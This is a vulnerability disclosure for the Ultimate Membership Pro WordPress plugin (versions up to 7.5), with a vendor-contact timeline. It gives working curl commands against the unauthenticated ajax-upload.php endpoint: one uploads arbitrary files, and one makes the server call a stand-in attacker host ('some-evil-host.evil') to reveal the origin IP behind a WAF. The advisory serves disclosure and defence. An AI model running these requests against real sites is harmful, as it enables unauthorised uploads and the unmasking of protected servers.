WordPress plugin: indeed-membership-pro <=7.5 arbitrary image upload


Ultimate Membership Pro is the well known and the best WordPress Membership Plugin that allow you to create and work with multi-level exclusive access for your Members based on simple Free packages or Payed packages.[1]

The ajax-upload.php endpoint doesn’t check for the current user’s capabilities (or that they are even logged in), so we can do a couple things we shouldn’t be able to do:

##Vulnerability #1 - Unauthenticated arbitrary image upload

Simply POST the image file in the field ihc_file and it’ll store it for you:

~$ curl -F "ihc_file=@some-image.png" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php

##Vulnerability #2 - Determine IP address of origin (not present in all versions)

In addition to cropping/rotating/resizing an image of your choosing, you can abuse the imgUrl feature on versions that it’s available on (7.4.2+ at least) to make an HTTP request to any site you want. By having it connect to a site you control, you can determine the IP address of the origin even when the site is behind a third party WAF such as Fastly, Cloudflare, Sucuri, etc:

curl -d "imgUrl=https://some-evil-host.evil/pwned.png" -d 'imgInitW=1' -d 'imgInitH=1' -d 'imgW=1' -d 'imgH=1' -d 'imgY1=1' -d 'imgX1=1' -d 'cropW=1' -d 'cropH=1' -d 'rotation=0' https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php


None, uninstall the plugin until the developer fixes it.

##Disclosure Timeline

  • 2019-01-23: Vendor contacted (Website contact form, Facebook) - no response.
  • 2019-02-04: Vendor contacted again (Envato contact form) - no response.
  • 2019-02-25: Heads-up posted to #wordpress on Freenode.
  • 2019-02-26: Public disclosure.


1) https://codecanyon.net/item/ultimate-membership-pro-wordpress-plugin/12159253




Filed under:


Navigation: Older Entry Newer Entry